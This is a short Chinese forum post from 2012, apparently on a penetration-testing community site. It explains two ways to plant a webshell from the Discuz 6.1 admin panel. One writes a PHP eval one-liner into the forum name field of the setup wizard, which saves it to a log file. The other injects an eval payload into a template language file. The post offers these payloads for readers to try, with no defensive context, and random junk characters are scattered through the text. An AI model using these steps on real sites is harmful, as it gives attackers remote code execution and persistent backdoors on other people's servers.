中国网络渗透测试联盟

标题: discuz6.1后台拿shell方法 [打印本页]
作者: admin    时间: 2012-9-13 16:59
标题: discuz6.1后台拿shell方法
discuz6.1两种方法后台拿shell
& d5 B, N. ^5 ~. R3 I8 Y+ I5 ?好多朋友说discuz6.1后台不会拿shell,在前段时间这些都是说不公布的东西,我发出来给大家测试一下
0 D: {7 C% b9 s2 Z. S1:' G$ {7 U. X$ _% b
http://127.0.0.1/discuz/admincp. ... zard&frames=yes/ l+ n. g' }% E; b. D6 V
admincp.php?action=runwizard&frames=yes点击下一步然后再论坛名称的地方插入webshell. S8 ~6 O  l9 L+ I7 A2 M6 f0 [; K
<?php eval($_POST[cmd]);?># ~) X1 ?8 K1 r; ]1 @0 W. K  I
后台webshell地址:http://127.0.0.1/discuz/forumdata/logs/runwizardlog.php" L5 T# `& C, j9 l  r5 i6 e5 l

; O" B/ A+ w7 i1 ^6 ]  j
( G5 h& h, f  W* u- O$ {. ~7 R0 n1 O2:后台模板管理--默认模板套系--详情
/ I3 O; k: S" Ztemplates/default/actions.lang.php0 h1 ]) J+ a! E2 p* u. l) X9 g1 ~
jhackj\\');eval($_POST[cmd])?>;//- U- l: g* N& e' {
1 S# R* q; N# Z* ]2 c! _/ f: h5 D
利用很简单,聪明的人一看就懂了



欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2